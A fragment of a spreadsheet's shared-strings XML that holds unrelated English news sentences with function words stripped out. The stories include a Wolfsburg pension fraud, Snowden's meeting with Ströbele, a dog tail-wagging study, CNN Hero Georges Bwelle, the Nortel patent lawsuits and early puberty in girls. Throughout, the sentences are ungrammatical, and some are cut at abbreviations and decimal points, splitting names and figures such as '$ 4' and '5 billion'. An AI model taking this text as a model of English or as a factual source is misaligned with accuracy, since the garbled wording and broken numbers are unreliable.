    <t xml:space="preserve"> The Israeli government previously repeatedly warned attempt Syria supply Hezbollah chemical dangerous weapons would crossing &amp;quot; red line &amp;quot; , would result military response </t>
  </si>
  <si>
    <t xml:space="preserve"> Mother buried shallow forest grave pension stolen When elderly mother died , man Wolfsburg devised plan </t>
  </si>
  <si>
    <t xml:space="preserve"> He buried deceased forest - continued collect pension care allowance </t>
  </si>
  <si>
    <t xml:space="preserve"> According police investigations , 67-year-old Wolfsburg resident buried dead mother woods order might continue collect pension care allowance </t>
  </si>
  <si>
    <t xml:space="preserve"> He first covered death 89-year-old pocketed money year half </t>
  </si>
  <si>
    <t xml:space="preserve"> According statement , man hid woman forest near Helmstedt </t>
  </si>
  <si>
    <t xml:space="preserve"> The man already suspicion back May: At time fact medications care-reliant mother longer required drew suspicion </t>
  </si>
  <si>
    <t xml:space="preserve"> The pensioner told investigators mother travelled Spain </t>
  </si>
  <si>
    <t xml:space="preserve"> The officials found strange continued investigate </t>
  </si>
  <si>
    <t xml:space="preserve"> It discovered mother son lived residence 15 years cared final days </t>
  </si>
  <si>
    <t xml:space="preserve"> According police , autopsy showed evidence capital offence </t>
  </si>
  <si>
    <t xml:space="preserve"> NSA siphons data Google Yahoo - Snowden wants help Secret Service whistleblower , Edward Snowden , fundamental interest helping Germany clarify increasingly explosive NSA espionage scandal </t>
  </si>
  <si>
    <t xml:space="preserve"> According Green Party MP </t>
  </si>
  <si>
    <t xml:space="preserve"> Hans-Christian Ströbele , surprising meeting Snowden Russia addressed conditions former Secret Service employee would make statement German District Attorney investigation committee </t>
  </si>
  <si>
    <t xml:space="preserve"> Snowden referred complex legal situation , Ströbele said ARD &amp;apos;s &amp;quot; Panorama &amp;quot; programme </t>
  </si>
  <si>
    <t xml:space="preserve"> Unknown attackers injure girl shots fired car Unknown attackers injured twelve-year-old girl Saxony-Anhalt firing shots car </t>
  </si>
  <si>
    <t xml:space="preserve"> The assailants fired group children Thursday evening Genthin , presumably air gun </t>
  </si>
  <si>
    <t xml:space="preserve"> This announced police Burg </t>
  </si>
  <si>
    <t xml:space="preserve"> The girl suffered minor injury left calf </t>
  </si>
  <si>
    <t xml:space="preserve"> Rescue workers took girl hospital </t>
  </si>
  <si>
    <t xml:space="preserve"> The shots came small car , drove past group six children suddenly stopped </t>
  </si>
  <si>
    <t xml:space="preserve"> Witnesses saw two people sitting car </t>
  </si>
  <si>
    <t xml:space="preserve"> The assailants also fired shots bus stop </t>
  </si>
  <si>
    <t xml:space="preserve"> A pane glass shattered </t>
  </si>
  <si>
    <t xml:space="preserve"> They drove away </t>
  </si>
  <si>
    <t xml:space="preserve"> The Criminal Investigation Department investigating matter , stated Friday </t>
  </si>
  <si>
    <t xml:space="preserve"> Hoarding Bechtle plot painted A group belonging &amp;quot; Schweizer Wiese &amp;quot; citizen &amp;apos;s initiative given hoarding Bechtle plot spa promenade Bad Herrenalb face-lift </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , cleaned widened footpath , press release announced </t>
  </si>
  <si>
    <t xml:space="preserve"> The planned covering dilapidated house rear plot permitted safety reasons , premises risk collapsing </t>
  </si>
  <si>
    <t xml:space="preserve"> Alfred Abel , currently manages site , arranged &amp;apos; face-lift &amp;apos; cooperation colleague , Reinhard Domke , citizen &amp;apos;s initiative </t>
  </si>
  <si>
    <t xml:space="preserve"> Before citizen &amp;apos;s initiative project , banner message &amp;quot; We favour &amp;quot; put </t>
  </si>
  <si>
    <t xml:space="preserve"> However , little distract 20 members citizen &amp;apos;s initiative project </t>
  </si>
  <si>
    <t xml:space="preserve"> Their motto , large billboard stated &amp;quot; We unfinished buildings &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> In wanted point danger even bigger ruins Schweizer Wiese - huge project one day fail </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</si>
  <si>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</si>
  <si>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 However , beginning resign town continues stall providing answers , said statement citizen &amp;apos;s initiative </t>
  </si>
  <si>
    <t xml:space="preserve"> We told public statements made Mayor also impact </t>
  </si>
  <si>
    <t xml:space="preserve"> In May , meeting Town Council , said feared outcome spa population vote plans spa wellness complex Schweizer Wiese local referendum </t>
  </si>
  <si>
    <t xml:space="preserve"> Some appear utterly frightened , others perceive &amp;quot; blatant attempt blackmail &amp;quot; population , continued press release citizen &amp;apos;s initiative </t>
  </si>
  <si>
    <t xml:space="preserve"> The citizen &amp;apos;s initiative thanked donated paint lent hand </t>
  </si>
  <si>
    <t xml:space="preserve"> On happiness dreaming camels Happiness oasis dreaming camels manage reach It piece Bedouin wisdom first ever chairman Wolfgang Henne described history fascination behind &amp;quot; Helping Hands &amp;quot; society </t>
  </si>
  <si>
    <t xml:space="preserve"> Saturday evening saw celebration tenth birthday organisation , already look back impressive results </t>
  </si>
  <si>
    <t xml:space="preserve"> Founding Chairman Henne reported depth work organisation </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2004 , visited Cheijk-Zajed Hospital Nouakchott Mauritania first time </t>
  </si>
  <si>
    <t xml:space="preserve"> As result , important collaboration developed gynaecologist , Hanne , performed countless operations several journeys location </t>
  </si>
  <si>
    <t xml:space="preserve"> During speech , images trips shown large screen , order give guests anniversary event insight initiatives mentioned </t>
  </si>
  <si>
    <t xml:space="preserve"> The organisation &amp;apos;s desert vehicle also shown </t>
  </si>
  <si>
    <t xml:space="preserve"> It former federal border protection vehicle </t>
  </si>
  <si>
    <t xml:space="preserve"> Rainer Prewo , former Lord Mayor Nagold , made suggestion equipping vehicle photovoltaic system , according Henne , planning assume advisory role within organisation </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2008 , Schleeh carpentry company Baiersbronn built hospital station Socogim , poor district edge Capital , record time less one week - free charge </t>
  </si>
  <si>
    <t xml:space="preserve"> Henne also mentioned new mother child hospital Nouakchott This particularly interesting time Nagold set away maternity clinic </t>
  </si>
  <si>
    <t xml:space="preserve"> You learn great deal working doctor Africa , said Henne , example slow avoid burn-out </t>
  </si>
  <si>
    <t xml:space="preserve"> Due political unrest country , possible make many journeys planned , reason , many local doctors come Germany , sit lectures variety topics </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , containers materials regularly sent Africa , example March year medical devices , medicines , bandaging material , hospital beds spectacles sent </t>
  </si>
  <si>
    <t xml:space="preserve"> Co-initiator Hans-Joachim Fuchtel provided plenty local colour , telling Mercedes vehicles Mauritania converted mobile goat stalls sharing experiences Stammheim musicians , traditionally support organisation trips Mauritania </t>
  </si>
  <si>
    <t xml:space="preserve"> He identified personal motivation work area auditing young member parliament </t>
  </si>
  <si>
    <t xml:space="preserve"> When became clear much money wasted , decided help Africans controlling budget people </t>
  </si>
  <si>
    <t xml:space="preserve"> Fuchtel also emphasised global economy requires global human kindness </t>
  </si>
  <si>
    <t xml:space="preserve"> The fact Africa lies closer many think means forgotten </t>
  </si>
  <si>
    <t xml:space="preserve"> Africa far Gran Canaria </t>
  </si>
  <si>
    <t xml:space="preserve"> Scientists shed light movements dog &amp;apos;s tail linked mood </t>
  </si>
  <si>
    <t xml:space="preserve"> Earlier research revealed happy dogs wag tails right (from dog &amp;apos;s point view), nervous dogs left-dominated swish </t>
  </si>
  <si>
    <t xml:space="preserve"> But scientists say fellow canines spot respond subtle tail differences </t>
  </si>
  <si>
    <t xml:space="preserve"> Prof Georgio Vallortigara , neuroscientist University Trento , said: &amp;quot; It well known humans left right side brain differently involved stimuli invokes positive negative emotions </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Here attempted look species </t>
  </si>
  <si>
    <t xml:space="preserve"> He added humans , dogs right side brain responsible left-handed movement vice versa , two hemispheres played different roles emotions </t>
  </si>
  <si>
    <t xml:space="preserve"> To find dogs react lop-sided tail wags dogs , researchers monitored animals watched films dogs </t>
  </si>
  <si>
    <t xml:space="preserve"> They measured pets &amp;apos; heart rates analysed behaviour </t>
  </si>
  <si>
    <t xml:space="preserve"> It probably long understand tails sometimes go one way , sometimes Prof Vallortigara said: &amp;quot; We presented dogs movies dogs - either naturalistic version silhouette get rid confounding issues , could doctor movement tail present tail left right </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; When animals saw otherwise expressionless dog move tail right (from tail-wagging dog &amp;apos;s point view), stayed perfectly relaxed </t>
  </si>
  <si>
    <t xml:space="preserve"> But spotted tail veer predominantly left (again tail-swishing dog &amp;apos;s point view), heart rates picked looked anxious </t>
  </si>
  <si>
    <t xml:space="preserve"> Prof Vallortigara said &amp;apos;t think dogs intentionally communicating movements </t>
  </si>
  <si>
    <t xml:space="preserve"> Instead , believes dogs learned experience moves &amp;apos;t feel worried </t>
  </si>
  <si>
    <t xml:space="preserve"> He said: &amp;quot; If several meetings dogs , frequently tail wagging one way associated friendly behaviour , right side producing less friendly behaviour , respond basis experience </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The researchers say findings could give owners , vets trainers better insight animal &amp;apos;s emotions </t>
  </si>
  <si>
    <t xml:space="preserve"> Dog behaviour expert John Bradshaw , visiting fellow University Bristol &amp;apos;s school veterinary science , said first study examine whether left right important canines </t>
  </si>
  <si>
    <t xml:space="preserve"> Last year team University Lincoln found dogs turn heads left looking aggressive dog right looking happy dog </t>
  </si>
  <si>
    <t xml:space="preserve"> And another research paper University Victoria Canada , said: &amp;quot; Dogs likely approach robot dog &amp;apos; tail &amp;apos; made wag left rather right , rather becoming anxious - opposite way around Italian study </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He said differences could dogs different studies fully interpreting animals films robo-dogs canines </t>
  </si>
  <si>
    <t xml:space="preserve"> A study dogs responded real dogs could help , explained </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; While considerable evidence many different mammals two sides brain used different purposes , much detail still hammered - dogs exception , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> However , given ease behaviour recorded , probably long understand tails sometimes go one way , sometimes </t>
  </si>
  <si>
    <t xml:space="preserve"> The USA still want prosecute Snowden The USA changed position regarding former US Secret Service employee Edward Snowden </t>
  </si>
  <si>
    <t xml:space="preserve"> He still accused passing secret information without authorisation </t>
  </si>
  <si>
    <t xml:space="preserve"> He must therefore face criminal proceedings USA , said spokesperson US Foreign Office , Jennifer Psaki , Washington </t>
  </si>
  <si>
    <t xml:space="preserve"> Even recent statements Snowden change fact </t>
  </si>
  <si>
    <t xml:space="preserve"> Following recent meeting Snowden Moscow , German Green Party politician Hans-Christian Ströbele appealed USA continue threaten prosecution </t>
  </si>
  <si>
    <t xml:space="preserve"> Psaki emphasised Ströbele &amp;apos;s comments views parliamentarian , German government member </t>
  </si>
  <si>
    <t xml:space="preserve"> Bird airlifted safety North Sea rig released back wild A bird airlifted ashore found exhausted North Sea oil rig released back wild </t>
  </si>
  <si>
    <t xml:space="preserve"> The water rail put helicopter Aberdeen last month nursed back health Scottish SPCA rescue centre Alloa </t>
  </si>
  <si>
    <t xml:space="preserve"> Centre manager Colin Seddon said: &amp;quot; This water rail likely winter migrant Northern Europe got caught strong winds North Sea </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It seems bird became exhausted managed find refuge oil rig </t>
  </si>
  <si>
    <t xml:space="preserve"> He added: &amp;quot; It unable fly contacted help </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The water rail fit well time released </t>
  </si>
  <si>
    <t xml:space="preserve"> Königsfeld: Small team gives spirited performance The voluntary fire service bravely came main autumn test run spite lack personnel </t>
  </si>
  <si>
    <t xml:space="preserve"> Only eleven men took part exercise </t>
  </si>
  <si>
    <t xml:space="preserve"> For training exercise , department commander , Hans Kammerer , chose Feder premises Burgberger Strasse </t>
  </si>
  <si>
    <t xml:space="preserve"> A short-circuit reported occurred sawing </t>
  </si>
  <si>
    <t xml:space="preserve"> Two people injured resulting fire spread smoke , however , one able make emergency call </t>
  </si>
  <si>
    <t xml:space="preserve"> Two fire fighters equipped respiratory gear prepared enter building following initial inspection situation Hans Kammerer </t>
  </si>
  <si>
    <t xml:space="preserve"> After short time managed find first person direct building </t>
  </si>
  <si>
    <t xml:space="preserve"> The second person carried </t>
  </si>
  <si>
    <t xml:space="preserve"> This simple also negotiate narrow stairwell </t>
  </si>
  <si>
    <t xml:space="preserve"> The building , workshop integrated stabling two horses , easy secure </t>
  </si>
  <si>
    <t xml:space="preserve"> There large quantities wood bales straw stored inside </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition , also electrical machines wood processing </t>
  </si>
  <si>
    <t xml:space="preserve"> The first attempt extinguish fire made using tank fire engine </t>
  </si>
  <si>
    <t xml:space="preserve"> Another line taken surface hydrant around 100 metres away </t>
  </si>
  <si>
    <t xml:space="preserve"> Only three attempts could made extinguish blaze </t>
  </si>
  <si>
    <t xml:space="preserve"> A hollow-stream nozzle building also used </t>
  </si>
  <si>
    <t xml:space="preserve"> For Hans Kammerer , exercise also chance show achieved available staff </t>
  </si>
  <si>
    <t xml:space="preserve"> In case emergency , support provided Königsfeld daytime task force </t>
  </si>
  <si>
    <t xml:space="preserve"> The Commander expressed satisfaction following exercise </t>
  </si>
  <si>
    <t xml:space="preserve"> Trekking mud , rivers jungle provide free medical care Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Georges Bwelle bringing free health care rural villages Cameroon Bwelle team spend almost every weekend seeing hundreds patients There &amp;apos;t many doctors west African country; one every 5,000 people Cast vote mobile device Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Georges Bwelle one top 10 CNN Heroes 2013 </t>
  </si>
  <si>
    <t xml:space="preserve"> You vote , top 10 Heroes , CNN Hero Year </t>
  </si>
  <si>
    <t xml:space="preserve"> That person receive $ 250,000 continue extraordinary work </t>
  </si>
  <si>
    <t xml:space="preserve"> For 21 years , Georges Bwelle watched ill father slip consciousness , traveling hospitals &amp;apos;t equipped help </t>
  </si>
  <si>
    <t xml:space="preserve"> Jamef Bwelle injured 1981 car accident near Yaounde , Cameroon &amp;apos;s capital </t>
  </si>
  <si>
    <t xml:space="preserve"> He suffered broken arm first , infection developed spread brain , creating hematoma would affect rest life </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; There neurosurgeons Cameroon , &amp;quot; Georges Bwelle said </t>
  </si>
  <si>
    <t xml:space="preserve"> We would taken Cameroon money </t>
  </si>
  <si>
    <t xml:space="preserve"> Instead , Bwelle spent years escorting father overcrowded clinics hospitals , getting whatever treatment could get </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It &amp;apos;s easy , &amp;quot; Bwelle said </t>
  </si>
  <si>
    <t xml:space="preserve"> You leave home 5 a</t>
  </si>
  <si>
    <t>m</t>
  </si>
  <si>
    <t xml:space="preserve"> , running hospital first , first </t>
  </si>
  <si>
    <t xml:space="preserve"> There lot patients </t>
  </si>
  <si>
    <t xml:space="preserve"> The situation &amp;apos;t changed much since Bwelle &amp;apos;s father passed away 2002 </t>
  </si>
  <si>
    <t xml:space="preserve"> In Cameroon , one doctor every 5,000 people , according World Health Organization </t>
  </si>
  <si>
    <t xml:space="preserve"> For comparison &amp;apos;s sake , ratio United States one doctor every 413 people </t>
  </si>
  <si>
    <t xml:space="preserve"> And even could see physician , many Cameroonians &amp;apos;t afford </t>
  </si>
  <si>
    <t xml:space="preserve"> Two five people country live poverty line , nearly three-quarters country &amp;apos;s health-care spending private </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The problem poverty , &amp;quot; Bwelle said </t>
  </si>
  <si>
    <t xml:space="preserve"> And poverty , cannot enjoy life </t>
  </si>
  <si>
    <t xml:space="preserve"> Seeing father many countrymen suffer , Bwelle determined something </t>
  </si>
  <si>
    <t xml:space="preserve"> Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Georges Bwelle team volunteers performed 700 free surgeries past year </t>
  </si>
  <si>
    <t xml:space="preserve"> He became doctor , working vascular surgeon Yaounde &amp;apos;s Central Hospital </t>
  </si>
  <si>
    <t xml:space="preserve"> And started nonprofit , ASCOVIME , travels rural areas weekends provide free medical care </t>
  </si>
  <si>
    <t xml:space="preserve"> Almost every Friday , 30 people jam vans , tie medical supplies roofs travel across rough terrain visit villages need </t>
  </si>
  <si>
    <t xml:space="preserve"> Their luck &amp;apos;t always hold </t>
  </si>
  <si>
    <t xml:space="preserve"> They &amp;apos;ve push vehicles rivers mud </t>
  </si>
  <si>
    <t xml:space="preserve"> But arrive , receive true heroes &amp;apos; welcome: feast , singing dancing , best accommodations community offer </t>
  </si>
  <si>
    <t xml:space="preserve"> In villages , free medical care truly cause celebration , Bwelle -- big smile boundless energy -- happy join fun </t>
  </si>
  <si>
    <t xml:space="preserve"> The next morning , team begins meeting hundreds patients </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We receiving 500 people trip , &amp;quot; Bwelle said </t>
  </si>
  <si>
    <t xml:space="preserve"> They coming 60 kilometers around village , &amp;apos;re coming foot </t>
  </si>
  <si>
    <t xml:space="preserve"> Each weekend clinics provides variety medical care </t>
  </si>
  <si>
    <t xml:space="preserve"> Many people treated malaria , tuberculosis , malnutrition , diabetes , parasites sexually transmitted diseases </t>
  </si>
  <si>
    <t xml:space="preserve"> Others might receive crutches , pair donated eyeglasses free birth certificates -- documentation &amp;apos;s required school many impoverished families simply &amp;apos;t afford </t>
  </si>
  <si>
    <t xml:space="preserve"> In evenings , team simple surgeries local anesthesia </t>
  </si>
  <si>
    <t xml:space="preserve"> Operations usually done schoolhouse , town hall home; procedure , patients get walk recovery area make way next person </t>
  </si>
  <si>
    <t xml:space="preserve"> With group &amp;apos;s generator lighting operating room sanitizing equipment , Bwelle volunteers work early hours Sunday morning </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s backbreaking pace , village musicians usually help keep team motivated </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They beating drums night keep us awake continue work , &amp;quot; Bwelle said </t>
  </si>
  <si>
    <t xml:space="preserve"> On Sunday , team heads back city , tired proud work </t>
  </si>
  <si>
    <t xml:space="preserve"> The group -- mix Cameroonian doctors foreign medical students -- performed 700 free surgeries past year , know help make world difference help </t>
  </si>
  <si>
    <t xml:space="preserve"> One man explained free hernia surgery &amp;apos;d received allow work </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This change future family , &amp;quot; man said </t>
  </si>
  <si>
    <t xml:space="preserve"> In addition holding weekend clinics working hospital surgeon , Bwelle also works nights private medical clinics around Yaounde </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s second job , said , funds 60% nonprofit; rest covered private donations </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I &amp;apos;m sure sleeps , &amp;quot; said Katie O &amp;apos;Malley , second-year medical student Drexel University Philadelphia volunteer Bwelle &amp;apos;s group </t>
  </si>
  <si>
    <t xml:space="preserve"> He always either hospital trying make money organization go campaigns </t>
  </si>
  <si>
    <t xml:space="preserve"> For medical nursing students O &amp;apos;Malley , come United States Europe join Bwelle missions , &amp;apos;s hands-on opportunity &amp;apos;d never get home </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We &amp;apos;ve able scrub surgeries help blot blood away hold tools Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Bwelle , &amp;quot; O &amp;apos;Malley said </t>
  </si>
  <si>
    <t xml:space="preserve"> That &amp;apos;s something &amp;apos;d ever get America second-year medical student </t>
  </si>
  <si>
    <t xml:space="preserve"> The student volunteers usually pay way Cameroon , often arriving donated medical supplies </t>
  </si>
  <si>
    <t xml:space="preserve"> But arrive Yaounde , board , transportation instruction covered Bwelle </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; He &amp;apos;s hero , without doubt , &amp;quot; O &amp;apos;Malley said </t>
  </si>
  <si>
    <t xml:space="preserve"> He gives life organization , desire help Cameroon people everlasting </t>
  </si>
  <si>
    <t xml:space="preserve"> For Bwelle , near-constant workload &amp;apos;t hardship </t>
  </si>
  <si>
    <t xml:space="preserve"> Helping others live happier lives , fulfilling promise made father , something brings great joy </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I happy I work , &amp;quot; Bwelle said </t>
  </si>
  <si>
    <t xml:space="preserve"> And I think father </t>
  </si>
  <si>
    <t xml:space="preserve"> I hope sees I </t>
  </si>
  <si>
    <t xml:space="preserve"> To make people laugh , reduce pain , &amp;apos;s I &amp;apos;m </t>
  </si>
  <si>
    <t xml:space="preserve"> Check ASCOVIME website see help </t>
  </si>
  <si>
    <t xml:space="preserve"> Endurance pays dividends Six teams battled become champion club tennis tournament </t>
  </si>
  <si>
    <t xml:space="preserve"> In end , endurance Maier / Bronner team decided final match </t>
  </si>
  <si>
    <t xml:space="preserve"> The tennis division Sportfreunde Rohrdorf (Rohrdorf Sports Fans) enjoyed perfect weather tournament local clubs enthusiasts </t>
  </si>
  <si>
    <t xml:space="preserve"> The focus tournament fun playing tennis </t>
  </si>
  <si>
    <t xml:space="preserve"> Five matches scheduled team , every team playing one match others </t>
  </si>
  <si>
    <t xml:space="preserve"> The matches doubles matches long set nine points , maximum duration 45 minutes </t>
  </si>
  <si>
    <t xml:space="preserve"> Anja Schlichter managed tournament The organisation tournament placed trusty hands Anja Schlichter , supported Carmen Müller Inga Kronemeyer </t>
  </si>
  <si>
    <t xml:space="preserve"> After first three matches lunch break pasta , tournament moved crucial phase </t>
  </si>
  <si>
    <t xml:space="preserve"> The favourites , Andre Maier / Matthias Bronner , tied Michael Klippel Sadmin Osmicic (both teams SG Rohrweiler), meaning last two games produce victor </t>
  </si>
  <si>
    <t xml:space="preserve"> At awards ceremony , Carmen Müller finally pleasure presenting Challenge Cup Andre Maier Matthias Bronner , shown greatest staying power final leg </t>
  </si>
  <si>
    <t xml:space="preserve"> Second place taken Michael Klippel / Sadmin Osmicic partnership </t>
  </si>
  <si>
    <t xml:space="preserve"> Bronze went Rainer Bernd Maier Asphaltriecher team </t>
  </si>
  <si>
    <t xml:space="preserve"> In late afternoon sun , accompanied coffee cake , tournament drew successful close </t>
  </si>
  <si>
    <t xml:space="preserve"> Guillaume Nicloux &amp;apos;s adaptation Denis Diderot &amp;apos;s novel boasts exceptional production design period detail also heavier going </t>
  </si>
  <si>
    <t xml:space="preserve"> Unfolding 1760s France , tells grim story Suzanne , young aristocrat sent convent family </t>
  </si>
  <si>
    <t xml:space="preserve"> When rebels , experiences extreme cruelty hands wantonly sadistic Mother Superior becomes object erotic fascination another </t>
  </si>
  <si>
    <t xml:space="preserve"> The film never slips prurience sensationalism - &amp;apos;s problem </t>
  </si>
  <si>
    <t xml:space="preserve"> The earnest solemnity storytelling risks making hair shirt-like ordeal audiences , </t>
  </si>
  <si>
    <t xml:space="preserve"> Google , Samsung , Huawei sued Nortel patents The group owns thousands former Nortel patents filed barrage patent lawsuits Thursday cell phone manufacturers including Google , company outbid Nortel bankruptcy auction </t>
  </si>
  <si>
    <t xml:space="preserve"> Rockstar , consortium bought Nortel patents $ 4</t>
  </si>
  <si>
    <t>5 billion , sued Samsung Electronics Co Ltd , HTC Corp , Huawei four companies patent infringement U</t>
  </si>
  <si>
    <t xml:space="preserve"> District Court Texas </t>
  </si>
  <si>
    <t xml:space="preserve"> Rockstar jointly owned Apple , Microsoft , Blackberry , Ericsson Sony </t>
  </si>
  <si>
    <t xml:space="preserve"> Google accused infringing seven patents </t>
  </si>
  <si>
    <t xml:space="preserve"> The patents cover technology helps match Internet search terms relevant advertising , lawsuit said , core Google &amp;apos;s search business </t>
  </si>
  <si>
    <t xml:space="preserve"> Representatives Samsung , Huawei , HTC Rockstar could immediately reached </t>
  </si>
  <si>
    <t xml:space="preserve"> Samsung , Huawei HTC manufacture phones operate Google &amp;apos;s Android operating system , competes fiercely Apple Microsoft mobile products </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2011 Google placed initial $ 900 million bid Nortel &amp;apos;s patents </t>
  </si>
  <si>
    <t xml:space="preserve"> Google increased bid several times , ultimately offering much $ 4</t>
  </si>
  <si>
    <t xml:space="preserve">4 billion </t>
  </si>
  <si>
    <t xml:space="preserve"> After losing Rockstar Nortel patents , Google went acquire Motorola Mobility $ 12</t>
  </si>
  <si>
    <t xml:space="preserve">5 billion , deal driven partly Motorola &amp;apos;s library patents </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Despite losing attempt acquire patents-in-suit auction , Google infringed continues infringe , &amp;quot; lawsuit said </t>
  </si>
  <si>
    <t xml:space="preserve"> Rockstar seeking increased damages Google , claims Google &amp;apos;s patent infringement willful , according complaint </t>
  </si>
  <si>
    <t xml:space="preserve"> Early puberty: Growing older sooner African-American Hispanic girls tend reach puberty earlier white counterparts , research shows </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Should mother alarmed daughter begins sprout breast buds pubic hair 7 8 ? At annual conference American Academy Pediatrics week Orlando , Florida , pediatric endocrinologist Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Paul Kaplowitz explained early physical changes quite common among American girls represent new norm </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I spend lot time reassuring parents -- usually , signal rapid progression full puberty , &amp;quot; said Kaplowitz </t>
  </si>
  <si>
    <t xml:space="preserve"> Obvious signs development , budding breasts , pubic underarm hair body odor appearing sooner girls </t>
  </si>
  <si>
    <t xml:space="preserve"> But slight shift age menarche (the first period) past four decades </t>
  </si>
  <si>
    <t xml:space="preserve"> In United States , average age 12</t>
  </si>
  <si>
    <t>5 years , 12</t>
  </si>
  <si>
    <t xml:space="preserve">75 1970 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Once breasts begin develop , takes least two three years menarche , &amp;quot; said Kaplowitz , also author &amp;quot; Early Puberty Girls: The Essential Guide Coping This Common Problem </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Time accurate test puberty going progress </t>
  </si>
  <si>
    <t xml:space="preserve"> There debate constitutes actual onset puberty , considered &amp;quot; precocious &amp;quot; breast enlargement accompanied growth spurt age 8 </t>
  </si>
  <si>
    <t xml:space="preserve"> In cases , process slow stall -- something pediatrician monitor closely </t>
  </si>
  <si>
    <t xml:space="preserve"> A rapid progression may warrant tests endocrinologist rule serious problems tumors cysts </t>
  </si>
  <si>
    <t xml:space="preserve"> There treatments delay early menses ward another consequence: premature aging bones ultimately lead stunted growth short adult </t>
  </si>
  <si>
    <t xml:space="preserve"> Recommendations drug hormone therapy based child &amp;apos;s age , rate development , growth rate emotional maturity </t>
  </si>
  <si>
    <t xml:space="preserve"> Psychosocial aspects important , </t>
  </si>
  <si>
    <t xml:space="preserve"> Kaplowitz cautious medication acknowledges , &amp;quot; suppressing puberty may alleviate behavioral issues girls &amp;apos; feelings different peers </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The big issue understandable: Parents simply &amp;apos;t want young daughters periods </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They worry risk pregnancy even handle hygiene , &amp;quot; said Kaplowitz </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It shock , &amp;quot; recalls one woman whose daughter started period 10 </t>
  </si>
  <si>
    <t xml:space="preserve"> Even though signs talked menstruation , emotionally prepared </t>
  </si>
  <si>
    <t xml:space="preserve"> There lots well-publicized theories causes precocious puberty </t>
  </si>
  <si>
    <t xml:space="preserve"> Yet , &amp;apos;s consistent body evidence hormones milk foods , chemicals environment sexual messages media blame </t>
  </si>
  <si>
    <t xml:space="preserve"> Boys - like girls - hitting puberty earlier </t>
  </si>
  <si>
    <t xml:space="preserve"> Kaplowitz contends premise holds weight epidemic obesity </t>
  </si>
  <si>
    <t xml:space="preserve"> He helped conduct 2001 study 6- 9-year-old girls links body fat timing puberty </t>
  </si>
  <si>
    <t xml:space="preserve"> Other findings support conclusion , many contributing factors </t>
  </si>
  <si>
    <t xml:space="preserve"> In country , African-American Hispanic girls tend reach puberty earlier white counterparts </t>
  </si>
  <si>
    <t xml:space="preserve"> There varying explanations </t>
  </si>
  <si>
    <t xml:space="preserve"> Globally , patterns early puberty appear influenced everything economic conditions climate genes </t>
  </si>
  <si>
    <t xml:space="preserve"> Another conundrum: Although boys getting facial pubic hair younger ages , trend toward full-blown early puberty pronounced girls </t>
  </si>
  <si>
    <t xml:space="preserve"> Other doctors attending AAP conference reinforced complexities topic </t>
  </si>
  <si>
    <t xml:space="preserve"> The appearance acne pubic hair common even infants toddlers </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We need careful identify true onset puberty , &amp;quot; said Dr</t>
  </si>
  <si>
    <t xml:space="preserve"> Lawrence Silverman , pediatric endocrinologist Goryeb Children &amp;apos;s Hospital Morristown , New Jersey </t>
  </si>
  <si>
    <t xml:space="preserve"> Parents hesitate get guidance pediatrician talk child </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It may mean sooner-than-expected conversation , &amp;quot; Kaplowitz advised </t>
  </si>
  <si>
    <t xml:space="preserve"> If remain calm , child usually respond well </t>
  </si>
  <si>
    <t xml:space="preserve"> Girls blossom early need reassurance , even happens ahead schedule , process normal part life </t>
  </si>
  <si>
    <t xml:space="preserve"> Issuing statements regarding Merkel spying scandal Russia The former US intelligence expert , Edward Snowden , may make statements regarding US espionage scandal involving Federal Chancellor , Angela Merkel , Russian asylum </t>
  </si>
  <si>
    <t xml:space="preserve"> Representatives German Federal Prosecutor &amp;apos;s Office could either submit questions writing meet 30-year-old person Russia , reported Interfax Agency </t>
  </si>
  <si>
    <t xml:space="preserve"> Green Party parliament representative , Hans-Christian Ströbele , yesterday first German politician meet Snowden Moscow , discuss scandal </t>
  </si>
  <si>
    <t xml:space="preserve"> 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 </t>
  </si>
  <si>
    <t xml:space="preserve"> Basharat Ditta , 42 , would feed sensitive intelligence crime lord Neil Scarbrough inquiries drug trafficking activities became compromised cocaine habit </t>
  </si>
  <si>
